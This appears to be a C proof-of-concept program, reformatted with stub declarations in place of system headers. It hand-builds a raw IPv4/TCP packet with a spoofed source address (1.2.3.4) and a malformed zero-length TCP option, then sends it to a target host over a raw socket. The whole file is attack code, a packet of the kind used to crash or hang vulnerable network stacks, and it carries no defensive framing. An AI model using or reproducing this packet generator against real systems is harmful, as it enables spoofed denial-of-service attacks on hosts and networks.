
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_6__ TYPE_3__ ;
typedef struct TYPE_5__ TYPE_2__ ;
typedef struct TYPE_4__ TYPE_1__ ;


struct tcphdr {int doff; int window; scalar_t__ urg_ptr; scalar_t__ check; scalar_t__ syn; scalar_t__ res1; scalar_t__ ack; scalar_t__ seq; void* dest; void* source; } ;
struct TYPE_5__ {void* s_addr; } ;
struct sockaddr_in {void* sin_port; TYPE_2__ sin_addr; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct TYPE_6__ {void* s_addr; } ;
struct TYPE_4__ {void* s_addr; } ;
struct ip {int ip_hl; int ip_v; int ip_ttl; int ip_len; TYPE_3__ ip_src; TYPE_1__ ip_dst; scalar_t__ ip_sum; int ip_p; scalar_t__ ip_off; scalar_t__ ip_id; scalar_t__ ip_tos; } ;
typedef int opts ;
typedef int datagram ;


 int AF_INET ;
 char* DADDR ;
 int IPPROTO_RAW ;
 int IPPROTO_TCP ;
 int PF_INET ;
 int SOCK_RAW ;
 int close (int) ;
 int exit (int) ;
 void* htons (int) ;
 void* inet_addr (char*) ;
 int memcpy (char*,char*,int) ;
 int memset (char**,int ,int) ;
 int perror (char*) ;
 int printf (char*) ;
 int sendto (int,char*,int,int ,struct sockaddr*,int) ;
 int socket (int ,int ,int ) ;

int main(int argc, char **argv)
{
int s;

char opts[] = "\x02\x00\xff\xff";
char datagram[64];
struct sockaddr_in addr;
struct ip *ip = (struct ip *) datagram;
struct tcphdr *tcp;

memset(&datagram, 0, sizeof(datagram));
addr.sin_addr.s_addr = inet_addr(DADDR);
addr.sin_port = htons(123);
addr.sin_family = AF_INET;

ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_id = 0;
ip->ip_off = 0;
ip->ip_ttl = 64;
ip->ip_p = IPPROTO_TCP;
ip->ip_len = 44;
ip->ip_sum = 0;
ip->ip_dst.s_addr = addr.sin_addr.s_addr;
ip->ip_src.s_addr = inet_addr("1.2.3.4");

tcp = (struct tcphdr *) (datagram + (ip->ip_hl << 2));
tcp->source = htons(321);
tcp->dest = addr.sin_port;
tcp->seq = 0;
tcp->ack = 0;
tcp->res1 = 0;
tcp->doff = 6;
tcp->syn = 0;
tcp->window = 0x1000;
tcp->check = 0;
tcp->urg_ptr = 0;

memcpy(datagram + 40, opts, sizeof(opts));

if ((s = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
perror("socket");
exit(0);
}

if (sendto(s, datagram, ip->ip_len, 0, (struct sockaddr *) &addr,
sizeof(struct sockaddr_in)) == -1) {
perror("sendto");
exit(-1);
}

printf("packet sent!\n");

close(s);
return 0;

}
